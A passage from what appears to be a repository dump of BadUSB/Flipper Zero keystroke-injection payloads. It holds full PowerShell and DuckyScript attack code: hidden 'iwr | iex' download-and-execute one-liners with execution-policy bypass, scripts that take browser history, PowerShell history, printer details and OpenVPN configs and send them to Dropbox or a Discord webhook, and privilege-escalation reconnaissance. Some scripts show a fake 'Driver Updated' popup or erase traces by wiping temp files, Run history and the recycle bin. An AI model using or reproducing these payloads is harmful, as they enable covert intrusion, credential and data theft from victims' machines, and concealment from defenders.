execute the script from memory\r\n```\r\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\r\n```\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Contributing\r\n\r\nAll contributors names will be listed here\r\n\r\natomiczsec\r\nI am Jakoby\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Version History\r\n\r\n* 0.1\r\n    * Initial Release\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- CONTACT -->\r\n## Contact\r\n\r\n<div align=\"center\">\r\n  <a href=\"https://lnk.bio/atomiczsec\">\r\n    <img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg\" width=\"48\" height=\"48\" alt=\"Link\" />\r\n  </a>\r\n</div>\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- ACKNOWLEDGMENTS -->\r\n## Acknowledgments\r\n\r\n* [Hak5](https://hak5.org/)\r\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>"
  },
  {
    "path": "FlipperZero/payloads/History-Pig/HP.ps1",
    "content": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The Chrome History file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Chrome History to Temp Directory to get sent to Dropbox\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history\"\r\n     Copy-Item \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -PathType Leaf)) {\r\n    try {\r\n        Write-Host \"The Edge History file has not been found. \"\r\n    }\r\n    catch {\r\n        throw $_.Exception.Message\r\n    }\r\n}\r\n # Copy Edge History to Temp Directory to get sent to Dropbox\r\n else {\r\n    $F2 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history\"\r\n    Copy-Item \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -Destination \"$env:tmp/$F2\" \r\n}\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"ADD-YOUR-DROPBOX-TOKEN-HERE\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nDropBox-Upload -f \"$env:tmp/$F2\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "FlipperZero/payloads/History-Pig/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# History-Pig\n\nA payload to exfiltrate the history of the 2 most popular browsers\n\n## Description\n\nThis payload will enumerate through the browser directories, looking for the file that stores the history\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/History-Pig/payload.txt",
    "content": "REM     Title: History-Pig\r\nREM     Author: atomiczsec\r\nREM     Description: This payload is meant to exfiltrate browsers history to a dropbox\r\nREM     Target: Windows 10, 11\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "FlipperZero/payloads/OVPN-Hog/o.ps1",
    "content": "function OVPN-Hog {\n    [CmdletBinding()]\n    param (\n        [parameter(Position=0,Mandatory=$False)]\n        [string]$file,\n        [parameter(Position=1,Mandatory=$False)]\n        [string]$text \n    )\n\n    $hookurl = 'DISCORD-WEBHOOK'\n\n    $Body = @{\n        'username' = $env:username\n        'content' = $text\n    }\n\n    if (-not ([string]::IsNullOrEmpty($text))) {\n        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)\n    }\n\n    if (-not ([string]::IsNullOrEmpty($file))) {\n        curl.exe -F \"file1=@$file\" $hookurl\n    }\n}\n\n$Drive = \"C:\"\n\n$Files = Get-ChildItem -Path $Drive -Filter \"*.ovpn\" -File -Recurse\n\nif ($Files) {\n    $types = @{\n        \"*.ovpn\" = \"OpenVPN\"\n    }\n\n    foreach ($type in $types.Keys) {\n        $filteredFiles = $Files | Where-Object { $_.Name -like $type }\n\n        if ($filteredFiles) {\n            $zipFile = Join-Path -Path $env:TEMP -ChildPath \"$($types[$type]).zip\"\n\n            $filteredFiles | Compress-Archive -DestinationPath $zipFile\n\n            OVPN-Hog -file $zipFile -text \"Uploading $($types[$type]) files\"\n        }\n    }\n}\n"
  },
  {
    "path": "FlipperZero/payloads/OVPN-Hog/payload.txt",
    "content": "REM     Title: Doc-Hog\r\nREM     Author: atomiczsec\r\nREM     Description: This payload will enumerate through the files looking for \".ovpn\" files. Then create ZIPs with them, then send to a discord webhook.\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "FlipperZero/payloads/OVPN-Hog/readme.md",
    "content": "<h1 align=\"center\">\r\n  <a href=\"https://git.io/typing-svg\">\r\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;OVPN-Hog!+😈&center=true&size=30\">\r\n  </a>\r\n</h1>\r\n\r\n<!-- TABLE OF CONTENTS -->\r\n<details>\r\n  <summary>Table of Contents</summary>\r\n  <ol>\r\n    <li><a href=\"#Description\">Description</a></li>\r\n    <li><a href=\"#Getting-Started\">Getting Started</a></li>\r\n    <li><a href=\"#Contributing\">Contributing</a></li>\r\n    <li><a href=\"#Version-History\">Version History</a></li>\r\n    <li><a href=\"#Contact\">Contact</a></li>\r\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\r\n  </ol>\r\n</details>\r\n\r\n# OVPN-Hog\r\n\r\nA PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).\r\n\r\n## Description\r\n\r\nThis script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.\r\n\r\n## Getting Started\r\n\r\n### Dependencies\r\n\r\n* DropBox or other file sharing service - Your Shared link for the intended file\r\n* Windows 10,11\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n### Executing program\r\n\r\n* Plug in your device\r\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\r\n```\r\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\r\n```\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Contributing\r\n\r\nAll contributors names will be listed here\r\n\r\natomiczsec\r\n\r\nI am Jakoby\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Version History\r\n\r\n* 0.1\r\n    * Initial Release\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- CONTACT -->\r\n## Contact\r\n\r\n<div align=\"center\">\r\n  <a href=\"https://lnk.bio/atomiczsec\">\r\n    <img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg\" width=\"48\" height=\"48\" alt=\"Link\" />\r\n  </a>\r\n</div>\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- ACKNOWLEDGMENTS -->\r\n## Acknowledgments\r\n\r\n* [Hak5](https://hak5.org/)\r\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>"
  },
  {
    "path": "FlipperZero/payloads/Powershell-History/PH.ps1",
    "content": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The Powershell History file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Powershell History to Temp Directory to get sent to Dropbox\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt\"\r\n     Copy-Item \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "FlipperZero/payloads/Powershell-History/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Powershell+History!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Powershell-History\n\nA payload to exfiltrate the history of the powershell console\n\n## Description\n\nThis payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Powershell-History/payload.txt",
    "content": "REM     Title: Powershell-History\r\nREM     Author: atomiczsec\r\nREM     Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "FlipperZero/payloads/Printer-Recon/PR.ps1",
    "content": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alias(\"f\")]\n[string]$SourceFilePath\n) \n$DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\n$outputFile = Split-Path $SourceFilePath -leaf\n$TargetFilePath=\"/$outputFile\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $DropBoxAccessToken\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n}\n\nfunction Clean-Exfil { \n\n# empty temp folder\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# delete run box history\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Empty recycle bin\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n}\n\n$F1 = \"$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt\"\n\nGet-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1\n\nDropBox-Upload -f $F1\n\nClean-Exfil\n\n\n\n\n\n"
  },
  {
    "path": "FlipperZero/payloads/Printer-Recon/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Printer+Recon!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Printer-Recon\n\n## Description\n\nThis payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Printer-Recon/payload.txt",
    "content": "REM     Title: Printer-Recon\r\nREM     Author: atomiczsec\r\nREM     Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "FlipperZero/payloads/Priv-Paths/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Priv+Paths!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Printer-Recon\n\n## Description\n\nA payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.\n\n## Getting Started\n\n### Dependencies\n\n* Discord Webhook or other service that uses webhooks\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Command will be entered in the command prompt to search for unqouted service paths so you can later exploit them for priv esc\n```\nwmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v ^\"^\"^\" > p.txt\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Priv-Paths/payload.txt",
    "content": "REM     Title: Priv-Paths\r\nREM     Author: atomiczsec\r\nREM     Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.\r\nREM     Target: Windows 10\r\nREM Put your discord webook in this define variable, it has the name of \"d\" to minimize the typing time of the rubberducky\r\nDELAY 3000\r\nGUI r \r\nDELAY 1000\r\nSTRING cmd \r\nENTER\r\nDELAY 500\r\nSTRING cd %HOMEPATH%\r\nENTER\r\nDELAY 1000\r\nSTRING wmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v ^\"^\"^\" > p.txt\r\nENTER\r\nDELAY 1000\r\nSTRING curl.exe -F \"payload_json={\\\"username\\\": \\\"p\\\", \\\"content\\\": \\\"**Paths**\\\"}\" -F \"file=@p.txt\" YOUR-DISCORD-WEBHOOK\r\nENTER\r\nDELAY 200\r\nSTRING del p.txt\r\nENTER\r\nDELAY 100\r\nSTRING exit\r\nENTER"
  },
  {
    "path": "FlipperZero/payloads/Proton-Hog/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Proton+Hog!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Proton-Hog\n\nA payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.\n\n## Description\n\nThis payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file\n\nThen dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 